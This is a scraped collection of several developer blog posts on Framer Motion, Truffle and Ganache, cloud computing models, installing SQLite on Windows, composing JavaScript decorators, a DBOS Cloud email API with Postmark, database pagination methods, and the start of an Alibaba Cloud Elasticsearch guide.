Framer Motion is a library that allows you to easily add animations to your React applications. It is used to add animation effects such as transitions and drag interactions.
**Creator**
It was created by the company Framer. Framer is a company that develops tools specifically for user interface (UI) design and prototyping.
**Installation**
Framer supports React 18 and higher versions. To install it via npm, run the following command:
```
npm install framer-motion
```
The Framer Motion library has no dependencies and you can start using it with a single package.


As of July 10, 2024, Framer Motion has approximately 3.4 million weekly downloads on npm and 22,700 stars on GitHub, indicating significant appreciation from its users.
**Usage**
Within your desired component, you can import the **_motion_** object from the **_framer-motion_** library and add a motion component for any HTML or SVG element.
```jsx
import { motion } from "framer-motion";
export default function App() {
return <motion.div />;
}
```
| boraacici |
1,917,932 | Developing Smart Contracts with Truffle and Ganache | Introduction: Smart contracts have revolutionized the way businesses operate by providing a secure... | 0 | 2024-07-10T00:33:59 | https://dev.to/kartikmehta8/developing-smart-contracts-with-truffle-and-ganache-2670 | Introduction:
Smart contracts have revolutionized the way businesses operate by providing a secure and transparent way of implementing agreements. They are self-executing contracts based on blockchain technology that eliminates the need for intermediaries in transactions. Developing smart contracts on the blockchain may seem like a daunting task, but with Truffle and Ganache, the process becomes easier and more efficient.
Advantages:
Truffle is a popular development framework that provides a comprehensive suite of tools for building and testing smart contracts. It simplifies the development process by providing a robust network, efficient testing framework, and easy debugging. On the other hand, Ganache is a personal blockchain platform that allows developers to test their smart contracts locally without incurring any gas fees. This saves both time and money as developers can quickly identify and fix any issues before deploying the contract on the live blockchain network.
Disadvantages:
One of the main disadvantages of using Truffle and Ganache is their steep learning curve. For new developers, it may take some time to get familiar with the tools and their functionalities. Additionally, Ganache only allows for local testing, so the smart contract may perform differently in a live network, leading to unforeseen errors.
Features:
Truffle and Ganache come with a range of features that make smart contract development efficient and hassle-free. Truffle provides automated contract testing, built-in build scripts, and built-in support for popular smart contract languages like Solidity and Vyper. Ganache offers a user-friendly interface for local testing, real-time contract execution, and the ability to change blockchain parameters for testing different scenarios.
Conclusion:
In conclusion, Truffle and Ganache are powerful tools that simplify the process of developing smart contracts. With their range of features and advantages, they are excellent for both beginners and experienced developers. However, it is essential to keep in mind their limitations and invest time in learning the tools thoroughly to harness their full potential. Overall, Truffle and Ganache make developing smart contracts a seamless and efficient process. | kartikmehta8 | |
1,917,936 | UNDERSTANDING CLOUD COMPUTING | Cloud computing delivers computing services such as servers, networking, analytics, and software over... | 0 | 2024-07-10T00:45:29 | https://dev.to/rosemary_aggreyyorke_992/understanding-cloud-computing-5daa | Cloud computing delivers computing services such as servers, networking, analytics, and software over the internet, making work more flexible and cost-effective.
Cloud computing cuts down cost for, in other words you pay for what you use. If you are not using it there is no cost involved.
It makes work easier and faster for developers. Also, there is a higher level of security cloud computing.
There are three deployment models, which consist of public cloud,private cloud and hybrid cloud.
Public cloud- A public cloud is a platform managed by an outside company that provides resources and services over the internet to users everywhere. It includes things like virtual machines, applications, and storage that can be accessed remotely.
Private cloud- A private cloud is a cloud setup just for one organization. It has its own computing resources like CPUs and storage that can be accessed when needed through a self-service portal. It is also known as an internal or corporate cloud.
Hybrid cloud- A hybrid cloud is a mix of different computing setups where applications use resources from both public and private clouds, as well as on-site data centers or edge locations. Many organizations use hybrid clouds because they don't rely solely on one public cloud provider.
The cloud service models are;
Iaas; Infrastructure as a Service, is a cloud computing model that provides on-demand access to computing power, storage, and networking. Example; Rackspace
Paas; Platform as a Service (PaaS) provides a full cloud environment with everything developers need to create, run, and manage applications. This includes servers, operating systems, networking, storage, middleware, and tools. Example; AWS
Saas; Software as a service, gives organizations benefits like flexibility and cost savings. With SaaS, vendors handle tasks like installing, managing, and updating software, so employees can focus on more important things. Example; Netflix
__ | rosemary_aggreyyorke_992 | |
1,917,940 | What charts would you want in a Portal? | shadcn came out with some nice looking charts recently - we're going to add some into the widgets for... | 0 | 2024-07-10T01:12:41 | https://dev.to/what-the-portal/what-charts-would-you-want-in-a-portal-15f9 | shadcn came out with some nice looking charts recently - we're going to add some into the widgets for you to see on your Portals. Boom.
Which ones would you want, and for what type of widgets?
Join the discussion
https://www.reddit.com/r/WhatThePortal/comments/1dzj122/how_about_some_charts/
| whattheportal | |
1,917,942 | How To Install SQLite On Windows | Howdy, In This Article We Will See How To Install Sqlite On Windows OS. Installing... | 0 | 2024-07-10T01:19:46 | https://dev.to/kotect/how-to-install-sqlite-on-windows-4b3g | Howdy, In This Article We Will See How To Install Sqlite On Windows OS.
### Installing Steps
1- Go To **[Sqlite Download Page](https://www.sqlite.org/download.html)** And Download `sqlite-tools-win-________.zip`

.
2- Now Extract The zipped File Then Rename The Extracted Folder To `sqlite`

.
3- Move The `sqlite` Folder To This Path `C:\Program Files`
> You Can Put The Folder At Any Path You Like!
.
4- Open Windows Search And Type `Environment Variables` Then Click On It, And Add The `sqlite` Folder Path To The **Environment Variables Path** By Clicking On Environment Variables > Choose Path > New > Paste The Path > Ok.

> You May Need To Restart Your PC If The sqlite Didn't Worked In The Last Step.
.
## Verifying The Installation
> Let's Make Sure That sqlite Is Installed And Working Properly.
Open command prompt `CMD` And Type:
```
sqlite3 --version
```
If You Got This Message Congrats! Installation Success:

<br>
**That's All, Thanks For Reading.
Please Follow Me For More Tutorials ❤️** | karim_abdallah | |
1,917,956 | Composing JavaScript Decorators | A walkthrough and best practices guide on how to compose JavaScript decorators that use... | 27,975 | 2024-07-10T01:33:34 | https://dev.to/frehner/composing-javascript-decorators-2o38 | webdev, javascript | A walkthrough and best practices guide on how to compose JavaScript decorators that use auto-accessors.
## Table of Contents
Consider skipping straight to [Best Practices](#best-practices)!
- [Context and Specification](#context-and-specification)
- [Preface](#preface)
- [Composing Decorators](#composing-decorators)
- [Non-Functional Chaining Example](#nonfunctional-chaining-example)
- [Writing Composable Decorators](#writing-composable-decorators)
- [Order Matters](#order-matters)
- [Best Practices](#best-practices)
## Context and Specification
The [Decorators Proposal on GitHub](https://github.com/tc39/proposal-decorators) and [my previous article on decorators](https://dev.to/frehner/javascript-decorators-and-auto-accessors-437i) already do a great job of breaking down the basic use-cases of decorators. My goal isn't to recreate those examples there, but instead to highlight some lesser-known features and interactions. Additionally, I'll highlight how to compose or chain multiple decorators on a single class property.
## Preface
Each code sample will come with a link to an interactive [Babel REPL playground](https://babeljs.io/repl#?browsers=defaults%2C%20not%20ie%2011%2C%20not%20ie_mob%2011&build=&builtIns=false&corejs=3.21&spec=false&loose=false&code_lz=Q&debug=false&forceAllTransforms=false&modules=false&shippedProposals=false&circleciRepo=&evaluate=true&fileSize=false&timeTravel=false&sourceType=module&lineWrap=false&presets=env%2Creact%2Cstage-2&prettier=false&targets=&version=7.24.7&externalPlugins=&assumptions=%7B%7D), so you can try it for yourself without needing to set up a polyfill or spin up a repo. The "Evaluate" option in the top left (under `Settings`) should be checked in all my examples, which means that you will be able to see the code, edit it, open your browser's dev console, and see the logs / results there.
**You don't need to pay attention to the transpiled code on the right-hand side of the Babel REPL**, unless you want to dig into the polyfill for decorators. The left-hand side of the Babel REPL is where you can edit and write code to try out for yourself.
**To emphasize, your developer tools' console should show console logs. If it doesn't, make sure that `Evaluate` is checked in the top left.**
## Composing Decorators
One important use-case that the proposal doesn't show is how to compose (or combine multiple) decorators on a single property. This is a powerful tool which helps keep your decorators clean and reusable, so let's dig into it.
In my [previous article on decorators](https://dev.to/frehner/javascript-decorators-and-auto-accessors-0-temp-slug-979005?preview=a74f965083163194f3db492b71b3b55162692b20ef9cc16fa970ea901af13a31d52d998dad6ecc7df2a94c63a58e4ed8d62a040f08f7e3b630edd6c0), it's was annoying to have to manually `console.log` after changing the value, so let's make a decorator that does that automatically for us - all while keeping the `evensOrOdds` decorator there, too!
### Non-Functional Chaining Example
My first impression when working with chaining decorators is that it would be as simple as adding the decorator and things would "Just Work". Unfortunately, that isn't the case; in this example below, I've added the `logOnSet` decorator before and after a property in order to demonstrate the issue. [Babel REPL](https://babeljs.io/repl#?browsers=defaults%2C%20not%20ie%2011%2C%20not%20ie_mob%2011&build=&builtIns=false&corejs=3.21&spec=false&loose=false&code_lz=GYVwdgxgLglg9mABAUwG7LAZwPICdsAmBmAFAgDYCeAoulogLyJS4jICUiA3gFCKK5kUELiShIsBIgLIIcXAEMo8kqgXk2AGkRywUZAA8onXvwCQ5IYhh7ko9QDkQAWwBGdxogAMfRGcHCoty-_PwA5kIkJiGh_kIiSDb69uRObnYx_AC-mpmImJFq5NGhsbqYUIhgLp5p7riq6ux5ZjDAJDCYDgoOJNXO7CWlsQD0I9IIAOSVBZVQABbIiEVs1sDWUJOYVXCVClUu9XnmAQnWtil1GcN-WS1tfTUApIgATIgAhAxMZGBUtBhtgB-byIABciAAjINgmY4acgkk7GBHIdrsMzHcbq0LijUmjcJ4iscBPFEbjUelcHksbdfHc7jxxNB4EhyHAwtgwABlSIAB0EwBgBk8kwUIGU7LCEVwkyGCLE4BZUhkckUygaK2Q2l0-iMQ34CuCN1mjWKxpuOgQmDglgAdFKSALkEKDNois1LaTAkhiTdadl6TxGRByApMNsALKUADCYYjFoAAmhAXhCMQSCw2J7EImpVzeVASJMU2AALRSmVguW-BQQCDICPyRDOGh0K7U_i-PMcguRSZwIgVjlVmv8ZN0HD4IikYDqAo5usNpuE1vpjvBng8cpzZDOPmeMDIADuiGjcfDpGa5VtyAdHOLpYhMjnIHIlS1k20-n3dtbALADtmh4H8-T_NsMA7UVFnIdlJm3a1b3vMJHzoCEFGAZJmFwSgbDCZg4HyKwbCKGACGWdQ2C_Zg9zA_92wJYDQPAgCoKYABmBCsCQx0SzQxAMKwlhcLAfDlCIuZCMHcj-nqajmPoyDGK3BSIMAglPAAFi4m17V4p8BMwjxZlgUSCJQOgDipeTaJYhiqWAsZEDLFzXLclytxvPSHwHIhnxdcV3wojRkBs381yIICVNsiKCDYxBJhguCdJ4nzpPQozCWEvDzNmc5SPIz9vxiyh12UkCSrKqlPE4ry7149LDKEnCcvEvLxOkqy5OK8LSsi8rVKq-otJS7yUN8ggMqwkzWsI0sursMK6L6uLGIAbiAA&debug=false&forceAllTransforms=false&modules=false&shippedProposals=false&circleciRepo=&evaluate=true&fileSize=false&timeTravel=false&sourceType=module&lineWrap=false&presets=env%2Creact%2Cstage-2&prettier=false&targets=&version=7.24.7&externalPlugins=&assumptions=%7B%7D)
```js
// THIS DOES NOT WORK CORRECTLY, DO NOT USE
// code collapsed from previous examples
function evensOrOdds(){}
function logOnSet(prefix = 'autologger') {
return function decorator(value, context) {
return {
set(val) {
console.log(prefix, val)
return val
}
}
}
}
class MyClass {
@evensOrOdds(true)
@logOnSet('even-logger:')
accessor myEvenNumber
@logOnSet('odd-logger:')
@evensOrOdds(false)
accessor myOddNumber
}
```
If you open the Babel REPL and look at the console logs, you may notice a couple of things:
- `even-logger` never shows up 🤔
- `myOddNumber` is always `0`, even though the `odd-logger` shows that there's a different value that's trying to be set 🤔
Despite the order we place the decorators in, nothing seems to be working as we expect it to. What's going on?
### Writing Composable Decorators
There's an important line in the decorators proposal that affects how multiple decorators work:
>Accessor decorators receive the original underlying getter/setter function as the first value, and can optionally return a new getter/setter function to replace it. Like method decorators, this new function is placed on the prototype in place of the original (or on the class for static accessors), and if any other type of value is returned, an error will be thrown.
In other words, the last-applied decorator's setter/getter methods win out, and none of the other decorators setters/getters are applied.
Since only one setter/getter is ever applied, how would we chain decorators?
Fortunately, our decorator is passed the previous decorator's setter/getter methods (or the native getter/setters if there are no others), so we can call them ourselves! Let's update the `logOnSet` decorator to do this, using the `value` parameter that the decorator is passed: [Babel REPL](https://babeljs.io/repl#?browsers=defaults%2C%20not%20ie%2011%2C%20not%20ie_mob%2011&build=&builtIns=false&corejs=3.21&spec=false&loose=false&code_lz=GYVwdgxgLglg9mABAUwG7LAZwPICdsAmBmAFAgDYCeAoulogLyJS4jICUiA3gFCKK5kUELiShIsBIgLIIcXAEMo8kqgXk2AGkRywUZAA8onXvwCQ5IYhh7ko9QDkQAWwBGdxogAMfRGcHCoty-_PwA5kIkJiGh_kIiSDb69uRObnYx_AC-mpmImJFq5NGhsbqYUIhgLp5p7riq6ux5ZjDAJDCYDgoOJNXO7CWlsQD0I9IIAOSVBZVQABbIiEVs1sDWUJOYVXCVClUu9XnmAQnWtil1GcN-WS1tfTUApIgATIgAhAxMZGBUtBhtgB-byIABciAAjINgmY4acgkk7GBHIdrsMzHcbq0LijUmjcJ4iscBPFEbjUelcHksbdfHc7jxxNB4EhyHAwtgwABlSIAB0EwBgBk8kwUIGU7LCEVwkyGCLE4BZUhkckUygaK2Q2l0-iMQ34CuCN1mjWKxpuOgQFUQArQ8BAmF5UGSADV1KsmFqAHSzb0QdTkEgLTraIqcIEg4mWq1YOCWb1Skh2oUGbR21AOp1CN0ejgko0ZrPO3MaZA0mK0hk8HgQcgKTDbACylAAwvXGxaAAJoQF4QjEYOsfP8LtSrnOkiTXtgAC0UplYLlvgUEAgyEb8kQzhodCu1P4vjHHInkUmcCI845i-Xo5nOHwRFIwHUBWa_FX683hJ3A_3PEZco5mQZw-U8MBkAAd0QFt2wbUhmnKeNkETDkpxnCEZBfEByEqLVJm0fRQO9HcATAfdmh4Ii-RI3cMH3UVFnIdlJlra1kNQsJ0LoCEFGAZJmFwSgbDCZg4HyKwbCKGACGWPMCOYECaNIvcCUo6jaLIhimAAZjYuMEyTaceMQPiBJYYSwFE5QJLmcSL1k_p6gUjSVPotSa1cujyIJTwABZ9MwDijIw0z-I8WZYCssSUDoA4qRcpTNNUqlKLGRBZ0yrLstnGskMMtDzyITDkGw3C5LLRLiN_IgKM8pKaoIbTEEmJiWMC4LCoc3jwsJCyRJi2Zzmk2T8MIhrKD_DyqImqaqU8PT8pQozurC8yhIGmyhpshz4uc8bqsm2rpq8ub6n8jqCq4oqCB6gTIs28SZz2uwquUo6mrUgBuIA&debug=false&forceAllTransforms=false&modules=false&shippedProposals=false&circleciRepo=&evaluate=true&fileSize=false&timeTravel=false&sourceType=module&lineWrap=false&presets=env%2Creact%2Cstage-2&prettier=false&targets=&version=7.24.7&externalPlugins=&assumptions=%7B%7D)
```js
function logOnSet(prefix = 'autologger') {
return function decorator(value, context) {
return {
set(val) {
const previousSetterValue = value.set.call(this, val) ?? val
console.log(prefix, previousSetterValue)
return previousSetterValue
}
}
}
}
```
That fixes the `myOddNumber` property and logger, but `myEvenNumber` still isn't working correctly; we need to do the same thing in the `evensOrOdds` decorator, too! [Babel REPL](https://babeljs.io/repl#?browsers=defaults%2C%20not%20ie%2011%2C%20not%20ie_mob%2011&build=&builtIns=false&corejs=3.21&spec=false&loose=false&code_lz=GYVwdgxgLglg9mABAUwG7LAZwPICdsAmBmAFAgDYCeAoulogLyJS4jICUiA3gFCKK5kUELiShIsBIgLIIcXAEMo8kqgXk2AGkRywUZAA8onXvwCQ5IYhh7ko9QDkQAWwBGdxogAMfRGcHCoty-_PwA5kIkJiGh_AD0cdZgqHAA1sjMABYZAA6CqPAgmIgRUPq42q4gUIgUlAJCIkhwIohq5DAEiGAu7rgxse1sAHSlwxDq5CRQmTCY7AN-AU1J5WCOvXaLAL6ai5iR7dGxsbqYNXlohZgAykLlAGrqbJ5DyMMHUOOT07OY2kdEAB-IFtdSLMxnGo9ZyeJxuOwkS4FFq3e52J4aDgQmDAEhzBwKBwkGHsY4ncwJaQIADkNU-WQyb2swGsUBpxTAcBqCm6m36FPMyyCNjWGwRApOZm2OLxMMQAFJEAAmRAAQgYTDIYCotAwxVBXkQAC5EABGMnBMzW4VIUV2dbkeF9CEyilme32J3817gwUNQJ22xe51bCluvwRmUynjiaDwJDkOBhbBgO5QJGCYAwAyeGkKapwJNhCK4Gnk22IOOSJAyOSKZS4VTPZDaXT6Izk_iV0wnT7N8hdk5QxDI67px4t31Yj5Cb7kKYzOYA9ScEFg8iLfhnIvvYuZ5DZgzaMeoicYlsLf2V09Fc-4TFsHYxKM8GMQcgKTDFACylAAwp-37BPwAACaD6nghDENMrDYmBxapumJA0hBYAALTFqWxrlr4CgQBAyDfvIiDODQdChpKvigYhaaRDScBEJhybYbhYFoTg-BEKQwDqAcV6IPhhHEbgpGUNBlFvjwPBUjuljjJYChNgsPAjvozg5J4YDIAA7ogf6AV-pALHJe7JihaGmjIvEgOQNRvDS2jqTkwxkXqYCUSpzmueRGCUXm2QLnANKqQgmC7sM-6oXQpoKMA5TMLglA2GEzBwIgDI2O0nQbmwjnMMgGk-e5nnSd5bkUT6TAAMyhVgEVRZZgnxR4LDJWAqXKBlVhdYxXQwn0-Xlb5Hn8l5hUuRVflVYgAAsdXhfJjUxc1CWfLAHVpSgdB8hKQ0TcVlUSipVLoWd50XdJpmReZDFEFZh4FnZuXIPtRVkRJY1lQdH1EP5TA0oFSYhddUV9bFLWiW1KVbZlyTqDlDlOT94l_V9PDDZ9EqeLVoO3eDq2tUlMNdQyvVELtg3I-9qMEKVGMo1jfSePNeNhChBNxWt9wk-laGU3Yb2TbTnkANxAA&debug=false&forceAllTransforms=false&modules=false&shippedProposals=false&circleciRepo=&evaluate=true&fileSize=false&timeTravel=false&sourceType=module&lineWrap=false&presets=env%2Creact%2Cstage-2&prettier=false&targets=&version=7.24.7&externalPlugins=&assumptions=%7B%7D)
```js
function evensOrOdds(onlyEvens = true) {
return function decorator(value, context) {
let internalNumber = 0
return {
get() {
// invoke the previous getter, but only return our valid number
value.get.call(this)
return internalNumber
},
set(val) {
const previousSetterValue = value.set.call(this, val) ?? val
const num = Number(previousSetterValue)
if(isNaN(num)) {
// don't set the value if it's not a number
return internalNumber
}
if(num % 2 !== (onlyEvens ? 0 : 1)) {
return internalNumber
}
internalNumber = val
return internalNumber
}
}
}
}
```
Note how we're calling the previous getter/setter with `.call(this, val)`, which helps ensure that the `this` value is consistent. Importantly, we're also using the nullish coalescing operator `?? val` at the end to ensure that, if the previous setter/getter doesn't return anything, we keep the original `val` and use that.
### Order Matters
Now that it's all working, let's take another close look at the logs. You may note that the `even-logger` logs the value _before_ it is validated by our `evensOrOdds` decorator, while the `odd-logger` logs the value _after_ the value has been validated.
It's important to note that the order of our chained decorators is different for each property:
```js
// weird ordering on decorators
class MyClass {
@evensOrOdds(true)
@logOnSet('even-logger:')
accessor myEvenNumber
@logOnSet('odd-logger:')
@evensOrOdds(false)
accessor myOddNumber
}
```
Decorators are executed from bottom-to-top, just like normal JavaScript functions are executed right-to-left: `last(first())`. We want our logger to be logging values _after_ validation, so let's reorder the decorators on `myEvenNumber` (and finally remove all the other console logs): [Babel REPL](https://babeljs.io/repl#?browsers=defaults%2C%20not%20ie%2011%2C%20not%20ie_mob%2011&build=&builtIns=false&corejs=3.21&spec=false&loose=false&code_lz=GYVwdgxgLglg9mABAUwG7LAZwPICdsAmBmAFAgDYCeAoulogLyJS4jICUiA3gFCKK5kUELiShIsBIgLIIcXAEMo8kqgXk2AGkRywUZAA8onXvwCQ5IYhh7ko9QDkQAWwBGdxogAMfRGcHCoty-_PwA5kIkJiGh_AD0cdZgqHAA1sjMABYZAA6CqPAgmIgRUPq42q4gUIgUlAJCIkhwIohq5DAEiGAu7rgxse1sAHSlwxDq5CRQmTCY7AN-AU1J5WCOvXaLAL6ai5iR7dGxsbqYNXlohZgAykLlAGrqbJ5DyMMHUOOT07OY2kdEAB-IFtdSLMxnGo9ZyeJxuOwkS4FFq3e52J4aDgQmDAEhzBwKBwkGHsY4ncwJaQIADkNU-WQyb2swGsUBpxTAcBqCm6m36FPMyyCNjWGwRApOZm2OLxMMQAFJEAAmRAAQgYTDIYCotAwxVBXkQAC5EABGMnBMzW4VIUV2dbkeF9CEyilme32J3817gwUNQJ22xe51bCluvwRmUynjiaDwJDkOBhbBgO5QJGCYAwAyeGkKapwJNhCK4Gnk22IOOSJAyOSKZS4VTPZDaXT6Izk_iV0wnT7N8hdk5QxDI67px4t31Yj5Cb7kKYzOYA9ScEFg8iLfhnIvvYuZ5DZgzaMeoicYlsLf2V09Fc-4TFsHYxKM8GMQcgKTDFACylAAwp-37BPwAACxapumJA0mgGAALTFqWxrlr4oGwVgeCEMQ0ysNi_AKBAEDIN-8iIM4NB0KGkqoRBaaRDScBEAhyZIShYHoTg-BEKQwDqAcV6IARREkbgZGUFhVFvjwPA7pY4yWAoTYLDJCDnMwyDODknhgMgADuiB_oBX6kAssl7sm0HoaaMi8SA5A1G8NLaPomnDORepgFRykuTkbkURgVF5tkC5wDS0k-X5HmBUwADM4Uab57mUT6TAACzSVScFZdlOXSWZwz7gxRDWYeBb2RubBOeprnkRJ_LeQlfl1RKQXICFYU8BFtVENFiBxZ1jXdQQvWpUAA&debug=false&forceAllTransforms=false&modules=false&shippedProposals=false&circleciRepo=&evaluate=true&fileSize=false&timeTravel=false&sourceType=module&lineWrap=false&presets=env%2Creact%2Cstage-2&prettier=false&targets=&version=7.24.7&externalPlugins=&assumptions=%7B%7D)
```js
// better ordering on decorators
class MyClass {
@logOnSet('even-logger:')
@evensOrOdds(true)
accessor myEvenNumber
@logOnSet('odd-logger:')
@evensOrOdds(false)
accessor myOddNumber
}
```
Those logs look better, and we've only had to write our console log logic once, too!
### Best Practices
A TLDR of the "Writing Composable Decorators" section.
- Call the the previous decorator's setter/getter: `value.set.call(this, val)` to enable chaining
- Fall back to the original value if the previous decorator's setter/getter doesn't return anything: `value.set.call(this, val) ?? val`
- Return a value in your setter/getter, so that other decorators can easily chain it: `return internalNumber`
- Ensure the order is correct - decorators execute from bottom-to-top! | frehner |
1,917,957 | DBOS-Cloud Simple and Robust Workflow Orchestration | This post gives a simple example which: 1) sets up api endpoints, 2) sends emails using Postmark when an api is hit, inserts events in to Postgres, and queries for those events. | 0 | 2024-07-10T02:50:18 | https://dev.to/vince_hirefunnel_co/dbos-cloud-simple-and-robust-workflow-orchestration-cn4 | dbos, workflows, postgres, orchestration | ---
title: DBOS-Cloud Simple and Robust Workflow Orchestration
published: true
description: This post gives a simple example which: 1) sets up api endpoints, 2) sends emails using Postmark when an api is hit, inserts events in to Postgres, and queries for those events.
tags: dbos, workflows, postgres, orchestration
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/u53vx60zfe2u9b36865g.png
# Use a ratio of 100:42 for best results.
published_at: current
---
This is a toy [DBOS](https://docs.dbos.dev/) app example focusing on remote deployment to [DBOS Cloud](https://www.dbos.dev/dbos-cloud), their hosted solution with a generous free tier for devs.
The [github repo](https://github.com/weisisheng/dbos-httpapi-postmark-v202407/tree/master) sets up two simple HTTP API endpoints that: 1) sends an email using Postmark ESP when you hit `/sendemail/:friend/:content` endpoint and 2) inserts a record into a postgres d'base instance and retrieves the records when you visit the `/emails` endpoint.
## Prerequisites
1. Make sure you have node.js 21.x
2. Sign up for DBOS Cloud (https://www.dbos.dev/dbos-cloud)
3. Have a Postmark account, username / password from the server (https://postmarkapp.com/), and a specific sending email address setup
\*\*\*Since this uses nodemailer, you can easily swap out Postmark for your email service provider of choice.
## Getting Started
1. Clone this repository and navigate to the project directory
2. Install the dependencies
**_*Be sure not to commit / hard code your secrets to a public repo! This setup is meant for local development and direct deployment to the dbos-cloud service.*_**
3. To deploy to DBOS-cloud, login with this, "**_npx dbos-cloud login_**" and follow the instructions to match the uuid given in the console to the one in the browser, then standard login user/password applies.
4. Next provision a d'base instance: "**_npx dbos-cloud db provision database-instance-name -U database-username_**"
5. Register your app with the d'base instance: "**_npx dbos-cloud app register -d database-instance-name_**"
6. To use secrets in DBOS, add your variables in the cli like this:
- export POSTMARK_USER=api-key-from-postmark-server-here
- export POSTMARK_PASSWORD=api-key-from-postmark-server-here
- export PGPASSWORD=put-the-password-you-created-when-you-setup-the-remote-database-here
- export SENDER_EMAIL=sender@foobar.com
- export RECIPIENT_EMAIL=receiver@foobar.com
These will be picked up at build time and inserted into the dbos-config.yaml fields: ${PGPASSWORD}, ${POSTMARK_USER}, ${POSTMARK_PASSWORD}, ${SENDER_EMAIL}, ${RECIPIENT_EMAIL} respectively.
7. And finally deploy your app: "**_npx dbos-cloud app deploy_**"
After a minute or two, you'll get back an api endpoint that looks like: `https://<username>-<app-name>.cloud.dbos.dev/`.
8. Test the endpoint:
First, visit `https://<username>-<app-name>.cloud.dbos.dev/sendemail/friend/content` replacing 'friend' and 'content' with your own choices. Hitting this sends an email using Postmark and inserts a record into the d'base named 'postmark'.
Then visit `https://<username>-<app-name>.cloud.dbos.dev/emails` to retrieve the records from the d'base.
9. To delete the app online,`npx dbos-cloud app delete [application-name] --dropdb`. Remove the '--dropdb' parameter if you want to retain the database table.
## Some caveats:
- **The endpoint is not secure**, and anyone can send an email if they guess the assigned endpoint. You should add some sort of authentication to the endpoint to prevent abuse.
Here are some instructions for that: https://docs.dbos.dev/tutorials/authentication-authorization
- When building workflows with DBOS, consider creating the respective standalone functions, then wrapping them in an Httpapi decorator / function, then wrap all that in a @workflow which will add a bunch of cool built-in features.
-- granular observability
-- guaranteed only once execution
-- asynchronous execution
-- precise management and observability of workflows
There are so many more benefits to mention re: debugging, monitoring and overall speed, security, and costs which can be explored further here: https://docs.dbos.dev/
---
## Reference Docs (From Official Repo)
- To add more functionality to this application, modify `src/operations.ts`, then rebuild and redeploy it.
- For a detailed tutorial, check out our [programming quickstart](https://docs.dbos.dev/getting-started/quickstart-programming).
- To learn how to deploy your application to DBOS Cloud, visit our [cloud quickstart](https://docs.dbos.dev/getting-started/quickstart-cloud/)
- To learn more about DBOS, take a look at [our documentation](https://docs.dbos.dev/) or our [source code](https://github.com/dbos-inc/dbos-transact).
| vince_hirefunnel_co |
1,917,961 | Comparing Limit-Offset and Cursor Pagination | Comparing Limit-Offset and Cursor Pagination There are two popular methods for pagination... | 0 | 2024-07-10T01:56:38 | https://dev.to/jacktt/comparing-limit-offset-and-cursor-pagination-1n81 | database, backend | ## Comparing Limit-Offset and Cursor Pagination
There are two popular methods for pagination that are `limit-offset pagination` and `cursor pagination`. Each has its own strengths and weaknesses, making them suitable for different scenarios. Let's explore these methods, comparing their performance, complexity, and use cases.
## Limit-Offset Pagination
**How It Works:**
Limit-offset pagination is straightforward and involves two main parameters:
1. **Limit**: The number of records to fetch.
2. **Offset**: The number of records to skip before starting to fetch the records.
On the user interface side, users typically see pages instead of limit-offset pairs. However, behind the scenes, these pages are converted to limit-offset using the following simple formula:
- limit = page size
- offset = (page number - 1) x page size
For example, in SQL, a query using limit-offset pagination might look like this:
```sql
SELECT * FROM articles ORDER BY id DESC LIMIT 10 OFFSET 20;
```
This query fetches 10 articles, skipping the first 20 (corresponds to page 3 with a page size of 10).
**Pros:**
1. **Simplicity**: Easy to understand and implement.
2. **Flexibility**: Allows direct access to any page of the results.
**Cons:**
1. **Performance**: Can become slow with large offsets since the database has to scan and discard the rows before the offset.
2. **Inconsistency**: Results can become inconsistent if the underlying data changes between queries. This is problematic in dynamic datasets where records are frequently added or removed.
## Cursor Pagination
**How It Works:**
Cursor pagination, also known as keyset pagination, uses a unique identifier (cursor) to mark the position in the dataset. Instead of using offset, it fetches records after the last retrieved record based on the cursor.
For example, a query might look like this:
```sql
SELECT * FROM articles WHERE id > 100 ORDER BY id ASC LIMIT 10;
```
Here, `100` is the cursor representing the last seen `id`.
**Pros:**
1. **Performance**: More efficient for large datasets since it avoids scanning and discarding rows.
2. **Consistency**: More consistent results in dynamic datasets as it is less affected by changes in the data.
**Cons:**
1. **Complexity**: Slightly more complex to implement, especially in maintaining the cursor state.
2. **Flexibility**: Less flexible in accessing arbitrary pages directly, as you must traverse sequentially from the start.
I recommend `against` exposing the ID directly for use as a cursor. The auto-incremented ID is sensitive information. It not only reveals the sequence of records but also exposes the total number of records through the last ID.
You can encrypt it before exposing, and then decrypt it upon receipt to prevent exposure of the raw value.
## Performance Comparison
**Limit-Offset Pagination:**
- Performance can degrade with high offset values due to the need to scan and discard many rows.
- Simple queries but can cause heavy load on the database in scenarios with deep pagination.
**Cursor Pagination:**
- Maintains high performance even with large datasets since it works by directly accessing the position marked by the cursor.
- Better suited for applications with continuous scrolling or infinite scroll patterns where users do not need to jump to arbitrary pages.
## Use Cases
**Limit-Offset Pagination:**
- Ideal for scenarios with relatively small datasets or where the need to jump to specific pages outweighs performance concerns.
- Suitable for static data where the likelihood of data changes between requests is low, such as paginated static reports.
**Cursor Pagination:**
- Best for applications dealing with large datasets or requiring high-performance pagination, such as social media feeds, activity streams, or scanning data for ETL tasks.
- Useful in dynamic environments where data changes frequently, ensuring more consistent user experiences.
## Conclusion
Choosing between limit-offset and cursor pagination depends on the specific needs and constraints of your application.
- Limit-offset pagination offers simplicity and flexibility but can suffer from performance issues with large datasets.
- Cursor pagination provides better performance and consistency, making it ideal for large or dynamic datasets, though it requires a bit more implementation effort. | jacktt |
1,917,962 | Unlocking the Power of Alibaba Cloud Elasticsearch: A Step-by-Step Guide to Accessing Your Cluster | Introduction Incorporating new technologies into museum displays or any data-intensive... | 0 | 2024-07-10T01:57:52 | https://dev.to/a_lucas/unlocking-the-power-of-alibaba-cloud-elasticsearch-a-step-by-step-guide-to-accessing-your-cluster-3jg1 | tutorial, programming, learning, ai | ## Introduction
Incorporating new technologies into museum displays or any data-intensive environment can significantly enhance user experiences and operational efficiency. Alibaba Cloud Elasticsearch offers robust solutions tailored for these needs. This guide will walk you through using PHP, Python, Java, and Go clients to access an [Alibaba Cloud Elasticsearch](https://www.alibabacloud.com/en/product/elasticsearch) cluster.
<a name="FgH46"></a>
## Preparations
<a name="sMxFB"></a>
### Step 1: Create an Alibaba Cloud Elasticsearch Cluster
Before accessing your Elasticsearch cluster, you need to create one. For detailed instructions, refer to the [Create an Alibaba Cloud Elasticsearch cluster](https://www.alibabacloud.com/en/product/elasticsearch) guide.
<a name="QgVyY"></a>
### Step 2: Install the Required Elasticsearch Client
Install the Elasticsearch client for your preferred programming language. Ensure you use a version compatible with your Elasticsearch cluster. For more details, see [Version Compatibility](https://www.alibabacloud.com/en/product/elasticsearch).
<a name="STuzb"></a>
